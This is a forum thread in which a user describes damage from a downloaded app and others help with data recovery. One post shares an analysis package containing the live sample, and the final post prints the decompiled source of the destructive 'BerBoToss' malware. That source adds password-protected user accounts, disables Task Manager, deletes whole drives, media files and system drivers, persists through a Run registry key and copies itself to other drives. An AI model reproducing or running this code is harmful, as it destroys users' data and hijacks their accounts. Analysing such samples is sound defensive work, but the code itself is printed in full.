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hey, i just found a link to an aapp, lets say very handy to have!

i thought that its too nice to be real so i scanned the file first on virustotal , and without any positive result!

then the bad things happened:

after running it..the app created multile user accounts, loked mine (admin), deleted restore point...

very nasty!

can someone debugg it? to see whats its all about and if i tooked any risk? i had some important things on my pc! (passwords etc)



thnx in advance!


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Hey blackpirate, your data shouldn't be lost. To get access to your data, use ERD Commander and you should be able to access any folder of your system.

Good luck


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thnx Nacho! ;)

as we speak i try to get them with recover my files pro! ;) since,.. donno , but 3 of my hdd partition were formatted ! and you right , from what i see untill now i can recover entire partition!

but none from C: , cause i reinstalled win 7!

btw: what the f#ck1n' app was that ? glad that didnt create lot of damage!

thnx again!



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It is a very basic malware with aggressive behavior, language: MS Visual Basic.NET

I made a short analysis...

Analysis package contains:

1- Analysis paper (PDF)

2- Active malware, archive password : malware

3- IDA Pro database file (BerBoToss) for IDA PRO (32bit)


BerBoToss analysis.rar

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It is a very basic malware with aggressive behavior, language: MS Visual Basic.NET

I made a short analysis...

Analysis package contains:

1- Analysis paper (PDF)

2- Active malware, archive password : malware

3- IDA Pro database file (BerBoToss) for IDA PRO (32bit)


STREL steppin up to the plate... Nice way to make an entrance...

Edited by JMC31337
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  • 1 month later...

May be a bit late in with this post, but the program isn't obfuscated :P

Courtesy of .Net Reflector:

internal sealed class Module1
// Methods
public static void DisableTaskMgr(bool Enable)
switch (Enable)
case false:
MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system", "DisableTaskMgr", "0", RegistryValueKind.DWord);
break; case true:
MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system", "DisableTaskMgr", "1", RegistryValueKind.DWord);
} [STAThread]
public static void Main()
MyProject.Computer.FileSystem.WriteAllText(@"C:\wmnpdmod.dll", "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss", false);
foreach (Process process in Process.GetProcessesByName("firefox"))
foreach (Process process2 in Process.GetProcessesByName("IEXPLORE"))
foreach (Process process3 in Process.GetProcessesByName("notepad"))
Interaction.Shell(@"cmd /c copy BerBoToss.exe C:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
Interaction.Shell(@"cmd /c BerBoToss >nul >C:\WINDOWS\system32\wmp.dll", AppWinStyle.Hide, true, -1);
Interaction.Shell("net user Administrateur /add", AppWinStyle.MinimizedFocus, false, -1);
Interaction.Shell(@"cmd /c copy BerBoToss.exe C:\WINDOWS\BerBoToss.exe", AppWinStyle.Hide, true, -1);
Interaction.Shell("net user Fes_L39_Berbotoss /add", AppWinStyle.MinimizedFocus, false, -1);
Interaction.Shell("net user 3an9oud-La3jeb /add", AppWinStyle.MinimizedFocus, false, -1);
MyProject.Computer.FileSystem.WriteAllText(@"C:\msimg32.dll", "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss", false);
Interaction.Shell("net user Berbotoss_L39 /add", AppWinStyle.MinimizedFocus, false, -1);
Interaction.Shell("net user Fes_L39_Berbotoss 1MarocBerbotossFes", AppWinStyle.MinimizedFocus, false, -1);
Interaction.Shell("net user 3an9oud-La3jeb 1MarocBerbotossFes", AppWinStyle.MinimizedFocus, false, -1);
Interaction.Shell("net user Administrateur 1marocberbotossfes", AppWinStyle.MinimizedFocus, false, -1);
Interaction.Shell("label c: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
Interaction.Shell("label d: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
Interaction.Shell("label e: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
Interaction.Shell("label f: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
Interaction.Shell("label g: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
Interaction.Shell("label h: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
Interaction.Shell("label l: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
Interaction.Shell("net user Berbotoss_L39 1MarocBerbotossFes", AppWinStyle.MinimizedFocus, false, -1);
Interaction.Shell("cmd /c NET SESSION * /del", AppWinStyle.Hide, false, -1);
Interaction.Shell("cmd /c NET SESSION \\poste_connect\x00e9 /del", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c rd d:\ /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c rd e:\ /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c rd f:\ /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c rd g:\ /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c del C:\*.mp3 /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c del C:\*.jpg /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c del C:\*.zip /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c del C:\*.rar /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c rd C:\WINDOWS\system32\drivers /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c del C:\*.lnk /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c del C:\*.3gp /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c del C:\*.lrc /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell("cmd /c Time 11:11.00", AppWinStyle.Hide, false, -1);
Interaction.Shell("cmd /c date 01/1/1987", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c echo BerBoToss v1.0 > nul > C:\WINDOWS\system32\obj\Release\BerBoToss.pdb", AppWinStyle.Hide, false, -1);
Interaction.Shell("cmd /c rundll32.exe user32.dll,LockWorkStation", AppWinStyle.Hide, true, -1);
Interaction.Shell(@"cmd /c del C:\*.html /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c copy BerBoToss.exe E:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
Interaction.Shell(@"cmd /c copy BerBoToss.exe F:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
Interaction.Shell(@"cmd /c copy BerBoToss.exe D:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
Interaction.Shell(@"cmd /c copy BerBoToss.exe g:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
Interaction.Shell(@"cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v BerBoToss /t REG_SZ /d C:\WINDOWS\BerBoToss.exe", AppWinStyle.Hide, true, -1);
MyProject.Computer.Clipboard.SetText("BerBoToss V1.0");
Interaction.Shell(@"cmd /c BerBoToss >nul >C:\WINDOWS\system32\xpsp2res.dll", AppWinStyle.Hide, true, -1);
foreach (Process process4 in Process.GetProcessesByName("msnmsgr"))
MyProject.Computer.FileSystem.WriteAllText(@"C:\kbdhe340.dll", "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss", false);
object obj2 = Interaction.MsgBox("BerBoToss Operation !!! Chinass Hakda Kayfahmo Chinass Hakda kayssam3o Hada Message lik Ou Lihoum \x00b0+... Daba AdiosS Amigoss", MsgBoxStyle.Information, "Maroc Fes Erreur HTTA 39 - Mardankore.dll ... & ");
Edited by JesusSpork
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